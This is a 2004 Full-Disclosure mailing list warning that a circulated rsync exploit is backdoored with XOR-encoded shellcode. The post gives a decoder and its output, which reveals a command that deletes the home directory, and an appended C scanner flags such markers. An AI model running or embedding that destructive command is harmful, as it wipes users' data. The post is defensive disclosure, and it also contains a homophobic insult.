[Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't run it!!!

From: DownBload / Illegal Instruction Labs (downbload_at_hotmail.com)
Date: 05/29/04

  • Next message: Etaoin Shrdlu: "Re: [Full-Disclosure] Printer Buffer Security??"
    To: full-disclosure@lists.netsys.com
    Date: Sat, 29 May 2004 15:24:09 +0200

    rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and
    malicious exploit.
    Don't run it!!!

    void (*funct) ();
    (long) funct = &shellcode2;

    "shellcode2" is malicious asm code that will delete your home directory.
    Shellcode is encrypted with a simple XOR algorithm to obscure its main
    Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot
    I can understand people who backdoor exploits to hack machines, but placing
    backdoors that will delete user home dir is evil and plain stupid.

    [rot@laptop BACKDOOR]# gcc back.c
    [root@laptop BACKDOOR]# ./a.out
    % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l

    ---cut here---
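    #include <stdio.h>

    /* array contents are missing from this copy of the post */
    char shellcode2[] =

    /* XOR-decode 0x29 bytes of shellcode2, starting at offset 23, with key 0xff */
    int main (int argc, char **argv)
    {
            char *decrypt = shellcode2+23, key=0xff;
            int x;
            for (x=0;x<0x29;x++) {
                    printf ("%c ", *decrypt ^ key);
                    decrypt++;
            }
    }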

    ---cut here---


    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
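
A static triage check for the trick described in this post, added here as an example (not code from the post or from the fake exploit): it tries every single-byte XOR key over a byte array lifted from untrusted source and reports the first key whose decoding contains a shell-command marker. The marker list, `scan_xor`, `build_sample` and the constructed sample buffer (a harmless `echo` command encoded with key 0xff at offset 23) are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_SCAN 4096
/* Strings worth flagging once a buffer is decoded (assumed list; extend it). */
static const char *MARKERS[] = { "/bin/sh", "rm -rf", "/dev/null" };
struct xor_hit { int found; unsigned char key; size_t offset; const char *marker; };

/* Try every single-byte XOR key on buf and report the first decoding that holds
 * a marker. Non-printable bytes become '.' so embedded NULs do not end the search. */
struct xor_hit scan_xor(const unsigned char *buf, size_t len)
{
    struct xor_hit hit = { 0, 0, 0, NULL };
    char plain[MAX_SCAN + 1];
    if (len > MAX_SCAN) len = MAX_SCAN;   /* only the first MAX_SCAN bytes are checked */
    for (int key = 1; key < 256; key++) {
        for (size_t i = 0; i < len; i++) {
            unsigned char c = buf[i] ^ (unsigned char)key;
            plain[i] = isprint(c) ? (char)c : '.';
        }
        plain[len] = '\0';
        for (size_t m = 0; m < sizeof MARKERS / sizeof MARKERS[0]; m++) {
            const char *p = strstr(plain, MARKERS[m]);
            if (!p) continue;
            return (struct xor_hit){ 1, (unsigned char)key, (size_t)(p - plain), MARKERS[m] };
        }
    }
    return hit;
}

/* Constructed sample: 23 filler bytes, then a harmless command XORed with 0xff. */
size_t build_sample(unsigned char *out, size_t cap)
{
    const char *cmd = "/bin/sh -c echo constructed-sample";
    size_t n = strlen(cmd), off = 23;
    if (cap < off + n) return 0;
    memset(out, 0x90, off);
    for (size_t i = 0; i < n; i++) out[off + i] = (unsigned char)cmd[i] ^ 0xff;
    return off + n;
}

int main(void)
{
    unsigned char buf[128];
    struct xor_hit h = scan_xor(buf, build_sample(buf, sizeof buf));
    if (h.found) printf("key=0x%02x offset=%zu marker=%s\n", h.key, h.offset, h.marker);
    return !h.found;
}
```

The scan only reads the bytes; copy the array out of the suspect source into a data file or test harness rather than compiling the suspect file itself.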
